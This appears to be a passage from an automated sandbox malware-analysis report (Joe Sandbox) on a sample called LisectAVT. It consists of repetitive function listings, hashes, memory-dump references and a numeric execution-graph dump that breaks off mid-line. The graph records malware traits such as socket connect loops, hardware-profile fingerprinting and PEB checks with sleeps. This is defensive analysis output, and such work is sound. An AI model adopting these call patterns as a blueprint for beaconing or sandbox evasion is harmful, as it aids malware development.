                                  • std::_Facet_Register.LIBCPMT ref: 00D8DF4B
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00D8DF63
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00D8DF7B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: 187a4b6aa1f4cb07ee34edf1e9779fb240d34cda7534d035825e020420355cef
                                  • Instruction ID: 99c12765cce4eab2a10584ce4c515890b48f97e6ca0c1e0a0da5727eb53755b5
                                  • Opcode Fuzzy Hash: 187a4b6aa1f4cb07ee34edf1e9779fb240d34cda7534d035825e020420355cef
                                  • Instruction Fuzzy Hash: CC41E1719002599FCB14EF58D841A6EBBB6FF50310F144668E945AB3D2D730AD04CBF1
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00D24F72
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00D24FFF
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00D250C8
                                  Strings
                                  • recursive_directory_iterator::operator++, xrefs: 00D2504C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy$___std_exception_copy
                                  • String ID: recursive_directory_iterator::operator++
                                  • API String ID: 1206660477-953255998
                                  • Opcode ID: 151531db8f738f72140fa2157602545381d5dbc150a7f1631c21989a9c8415ac
                                  • Instruction ID: bd10c1e2204a00ec880deadfd1e1331cda223fbef29b90b1bba0d51085b4943a
                                  • Opcode Fuzzy Hash: 151531db8f738f72140fa2157602545381d5dbc150a7f1631c21989a9c8415ac
                                  • Instruction Fuzzy Hash: 67E124B19002049FDB18DF68E845BAEB7F9FF44700F148A2DE856A3781D774A944CBB1
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00D2799A
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00D27B75
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: out_of_range$type_error
                                  • API String ID: 2659868963-3702451861
                                  • Opcode ID: f79c607325ee9d092274a5225edbb507e881eda4d3eac8f7cc169e34302ceb33
                                  • Instruction ID: 0f2d01505593f80958d6d6355b465ad299adfc2af31b42ebe2677cb2737c71d6
                                  • Opcode Fuzzy Hash: f79c607325ee9d092274a5225edbb507e881eda4d3eac8f7cc169e34302ceb33
                                  • Instruction Fuzzy Hash: EFC168B19002189FDB18CFA8E98479DFBF1FF49310F14866AE419EB781E7749980CB61
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00D22275
                                    • Part of subcall function 00DFD6E9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00DFD6F5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                  • String ID: string too long$L$L
                                  • API String ID: 1997705970-3008666486
                                  • Opcode ID: a58f9060ca3d115a213af190cadb07fbf8788cb861d298d5b60447f4d7ca602a
                                  • Instruction ID: 8a502bb09a3277092bf086fb81557303d0aa67f9141c3508cbd8e40007b3c93d
                                  • Opcode Fuzzy Hash: a58f9060ca3d115a213af190cadb07fbf8788cb861d298d5b60447f4d7ca602a
                                  • Instruction Fuzzy Hash: EC812175A04295AFDB05CF68C4507FDBBF1EF6A304F18419EE894A7782C3658546CBB0
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00D275BE
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00D275CD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: at line $, column
                                  • API String ID: 4194217158-191570568
                                  • Opcode ID: 3d53d2a4b37ec84d9670e74abaf582749c1a968e8b419b8f58ac9cffc9074832
                                  • Instruction ID: 4a6b8b0cda11e8a106d81ae433271370a17586f6d1c8dca54f19468f52ae92f5
                                  • Opcode Fuzzy Hash: 3d53d2a4b37ec84d9670e74abaf582749c1a968e8b419b8f58ac9cffc9074832
                                  • Instruction Fuzzy Hash: 7D61F571A042149FDB18DF68EC85B9DFBF6FF44304F24862CE415A7B81D774AA408BA0
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00D23E7F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                  • API String ID: 2659868963-1866435925
                                  • Opcode ID: b6208f2d8e3c4a35edaafe7a8085803fd8f27c942fa80abed92b8200fddef056
                                  • Instruction ID: 9ab6cf41562cefbb97202807d929837db02cf5e4326b2d65a2c2d516a45557b4
                                  • Opcode Fuzzy Hash: b6208f2d8e3c4a35edaafe7a8085803fd8f27c942fa80abed92b8200fddef056
                                  • Instruction Fuzzy Hash: 4741D7B2900214AFCB04DF58E845BAEB7F8EF58710F18852AF955E7741E774AA058BB0
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00D23E7F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                  • API String ID: 2659868963-1866435925
                                  • Opcode ID: d52c0e3f0c634a782df01a06be4cd2ef8671fae5e9081a2b42037b7d62bca7ec
                                  • Instruction ID: b11738e0bf25e5146083c0727a54ba40468fea444a69d2b8b98e04d1ffec4dd3
                                  • Opcode Fuzzy Hash: d52c0e3f0c634a782df01a06be4cd2ef8671fae5e9081a2b42037b7d62bca7ec
                                  • Instruction Fuzzy Hash: 8621EBB29003156BC714DF58F806B96B7E8AF54310F18893AFA68A7641E774EA14CBA1
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00D27340
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_copy
                                  • String ID: parse error$parse_error
                                  • API String ID: 2659868963-1820534363
                                  • Opcode ID: 5e253fcdd7780dcf95bb47d0ca72f4f7e9cd562b003c4edfce8cd924ff65c799
                                  • Instruction ID: 9cf725ae14c55a0abbb76dfb28a914ed8bcd7e3149cddf3ef4e09b582037ebb9
                                  • Opcode Fuzzy Hash: 5e253fcdd7780dcf95bb47d0ca72f4f7e9cd562b003c4edfce8cd924ff65c799
                                  • Instruction Fuzzy Hash: D8E17D709042188FDB18CF68D985B9DBBF1FF49304F248269E418EB792D7749A85CFA1
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00D26F11
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00D26F20
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: [json.exception.
                                  • API String ID: 4194217158-791563284
                                  • Opcode ID: db91f23dbdbbb0fc02b0c3528b1359d1eccfaea858dd011208f086ab03d30b79
                                  • Instruction ID: 4010d413027c8c22268f29f66a887efa92e168628be1a00764bddace8ce50b1e
                                  • Opcode Fuzzy Hash: db91f23dbdbbb0fc02b0c3528b1359d1eccfaea858dd011208f086ab03d30b79
                                  • Instruction Fuzzy Hash: 2B91A270A003189FDB18CF68E984B9EBBF6EF55304F20856DE415AB792D771E981CB60
                                  APIs
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00D9E491
                                  Strings
                                  • type must be boolean, but is , xrefs: 00D9E582
                                  • type must be string, but is , xrefs: 00D9E4F8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4145669550.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D20000, based on PE: true
                                  • Associated: 00000000.00000002.4145585056.0000000000D20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145669550.0000000000E53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145882356.0000000000E58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000E5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000000FE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.00000000010CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.0000000001100000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4145908249.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147310202.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4147570115.00000000012C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d20000_LisectAVT_2403002A_140.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task
                                  • String ID: type must be boolean, but is $type must be string, but is
                                  • API String ID: 118556049-436076039
                                  • Opcode ID: f453e465752e26eb3167f3548aec6ce29610932599e86b6b3c51d926a53a576d
                                  • Instruction ID: 5995bf71652793140ce2ad4cfa703cd9ccd26f16c6d4b808263f2d1edffbf665
                                  • Opcode Fuzzy Hash: f453e465752e26eb3167f3548aec6ce29610932599e86b6b3c51d926a53a576d
                                  • Instruction Fuzzy Hash: E8416EB1904248AFDF14EBA4E802BAEB7A8DB10714F144679F415E7782EB35E944C7B2

                                  Execution Graph

                                  Execution Coverage:2.7%
                                  Dynamic/Decrypted Code Coverage:2.7%
                                  Signature Coverage:0%
                                  Total number of Nodes:624
                                  Total number of Limit Nodes:62
                                  execution_graph 19702 a3e0a0 WSAStartup 19703 a3e0d8 19702->19703 19707 a3e1a7 19702->19707 19704 a3e175 socket 19703->19704 19703->19707 19705 a3e18b connect 19704->19705 19704->19707 19706 a3e19d closesocket 19705->19706 19705->19707 19706->19704 19706->19707 19718 5060700 19719 5060728 19718->19719 19722 5060867 19719->19722 19723 506087d 19722->19723 19728 50608d6 19723->19728 19729 50608ea GetCurrentHwProfileW 19728->19729 19731 506091f 19729->19731 21138 50608e1 21139 506090a GetCurrentHwProfileW 21138->21139 21141 506091f 21139->21141 19708 a83a40 19711 a83a55 19708->19711 19709 a83b28 GetPEB 19709->19711 19710 a83a73 GetPEB 19710->19711 19711->19709 19711->19710 19712 a83b9d Sleep 19711->19712 19713 a83ae8 Sleep 19711->19713 19714 a83bc7 19711->19714 19712->19711 19713->19711 19715 506096d 19716 506090d GetCurrentHwProfileW 19715->19716 19717 506091f 19715->19717 19716->19717 18977 a2a210 19010 aff290 18977->19010 18979 a2a248 19015 a22ae0 18979->19015 18981 a2a28b 19031 b05362 18981->19031 18985 a2a377 18988 a2a34e 18988->18985 19060 b047b0 18988->19060 18991 b09136 4 API calls 18992 a2a2fc 18991->18992 18997 a2a318 18992->18997 19046 a8cf60 18992->19046 19051 b0dbdf 18997->19051 19012 a221d0 Concurrency::cancel_current_task std::_Xinvalid_argument ___std_exception_copy std::_Facet_Register 19010->19012 19011 aff2af 19011->18979 19012->19011 19063 b00651 19012->19063 19016 a22ba5 19015->19016 19022 a22af6 19015->19022 19281 a22270 19016->19281 19017 a22b02 std::locale::_Locimp::_Locimp 19017->18981 19019 a22b2a 19023 aff290 std::_Facet_Register RtlAllocateHeap 19019->19023 19020 a22baa 19291 a221d0 19020->19291 19022->19017 19022->19019 19025 a22b65 19022->19025 19026 a22b6e 19022->19026 19024 a22b3d 19023->19024 19027 b047b0 RtlAllocateHeap 19024->19027 19028 a22b46 std::locale::_Locimp::_Locimp 19024->19028 19025->19019 19025->19020 19026->19028 19029 aff290 std::_Facet_Register RtlAllocateHeap 19026->19029 19030 a22bb4 19027->19030 19028->18981 19029->19028 19304 b052a0 19031->19304 19033 a2a2d7 19033->18988 19034 b09136 19033->19034 19035 b09149 ___std_exception_copy 19034->19035 19328 b08e8d 19035->19328 19037 b0915e 19038 b044dc ___std_exception_copy RtlAllocateHeap 19037->19038 19039 a2a2ea 19038->19039 19040 b04eeb 19039->19040 19041 b04efe ___std_exception_copy 19040->19041 19461 b04801 19041->19461 19043 b04f0a 19044 b044dc ___std_exception_copy RtlAllocateHeap 19043->19044 19045 a2a2f0 19044->19045 19045->18991 19047 a8cfa7 19046->19047 19050 a8cf78 __fread_nolock 19046->19050 19509 a90560 19047->19509 19049 a8cfba 19049->18997 19050->18997 19524 b0dbfc 19051->19524 19053 a2a348 19054 b08be8 19053->19054 19055 b08bfb ___std_exception_copy 19054->19055 19648 b08ac3 19055->19648 19057 b08c07 19058 b044dc ___std_exception_copy RtlAllocateHeap 19057->19058 19059 b08c13 19058->19059 19059->18988 19061 b046ec ___std_exception_copy RtlAllocateHeap 19060->19061 19062 b047bf __Getctype 19061->19062 19064 a22213 19063->19064 19065 b0065e ___std_exception_copy 19063->19065 19064->18979 19065->19064 19066 b0068b 19065->19066 19069 b156b8 19065->19069 19078 b0d7d6 19066->19078 19070 b156d4 19069->19070 19071 b156c6 19069->19071 19081 b0d23f 19070->19081 19071->19070 19076 b156ec 19071->19076 19073 b156dc 19084 b047a0 19073->19084 19075 b156e6 19075->19066 19076->19075 19077 b0d23f __dosmaperr RtlAllocateHeap 19076->19077 19077->19073 19079 b16db3 __freea RtlAllocateHeap 19078->19079 19080 b0d7ee 19079->19080 19080->19064 19087 b15d2c 19081->19087 19192 b046ec 19084->19192 19088 b15d35 __dosmaperr 19087->19088 19095 b0d244 19088->19095 19098 b163f3 19088->19098 19090 b15d79 __dosmaperr 19091 b15db9 19090->19091 19092 b15d81 __dosmaperr 19090->19092 19106 b15a09 19091->19106 19102 b16db3 19092->19102 19095->19073 19097 b16db3 __freea RtlAllocateHeap 19097->19095 19101 b16400 __dosmaperr std::_Facet_Register 19098->19101 19099 b1642b RtlAllocateHeap 19100 b1643e __dosmaperr 19099->19100 19099->19101 19100->19090 19101->19099 19101->19100 19103 b16de8 19102->19103 19104 b16dbe __dosmaperr 19102->19104 19103->19095 19104->19103 19105 b0d23f __dosmaperr RtlAllocateHeap 19104->19105 19105->19103 19107 b15a77 __dosmaperr 19106->19107 19110 b159af 19107->19110 19109 b15aa0 19109->19097 19111 b159bb __fread_nolock std::_Lockit::_Lockit 19110->19111 19114 b15b90 19111->19114 19113 b159dd __dosmaperr 19113->19109 19115 b15bc6 __Getctype 19114->19115 19116 b15b9f __Getctype 19114->19116 19115->19113 19116->19115 19118 b1f2a7 19116->19118 19119 b1f2bd 19118->19119 19120 b1f327 19118->19120 19119->19120 19126 b1f2f0 19119->19126 19129 b16db3 __freea RtlAllocateHeap 19119->19129 19122 b16db3 __freea RtlAllocateHeap 19120->19122 19145 b1f375 19120->19145 19123 b1f349 19122->19123 19124 b16db3 __freea RtlAllocateHeap 19123->19124 19127 b1f35c 19124->19127 19125 b1f312 19128 b16db3 __freea RtlAllocateHeap 19125->19128 19126->19125 19131 b16db3 __freea RtlAllocateHeap 19126->19131 19130 b16db3 __freea RtlAllocateHeap 19127->19130 19132 b1f31c 19128->19132 19134 b1f2e5 19129->19134 19137 b1f36a 19130->19137 19138 b1f307 19131->19138 19139 b16db3 __freea RtlAllocateHeap 19132->19139 19133 b1f3e3 19140 b16db3 __freea RtlAllocateHeap 19133->19140 19146 b1e5ab 19134->19146 19135 b1f383 19135->19133 19143 b16db3 RtlAllocateHeap __freea 19135->19143 19141 b16db3 __freea RtlAllocateHeap 19137->19141 19174 b1ea0a 19138->19174 19139->19120 19144 b1f3e9 19140->19144 19141->19145 19143->19135 19144->19115 19186 b1f418 19145->19186 19147 b1e5bc 19146->19147 19173 b1e6a5 19146->19173 19148 b1e5cd 19147->19148 19149 b16db3 __freea RtlAllocateHeap 19147->19149 19150 b16db3 __freea RtlAllocateHeap 19148->19150 19152 b1e5df 19148->19152 19149->19148 19150->19152 19151 b1e5f1 19154 b1e603 19151->19154 19156 b16db3 __freea RtlAllocateHeap 19151->19156 19152->19151 19153 b16db3 __freea RtlAllocateHeap 19152->19153 19153->19151 19155 b1e615 19154->19155 19157 b16db3 __freea RtlAllocateHeap 19154->19157 19158 b1e627 19155->19158 19159 b16db3 __freea RtlAllocateHeap 19155->19159 19156->19154 19157->19155 19160 b1e639 19158->19160 19161 b16db3 __freea RtlAllocateHeap 19158->19161 19159->19158 19162 b1e64b 19160->19162 19164 b16db3 __freea RtlAllocateHeap 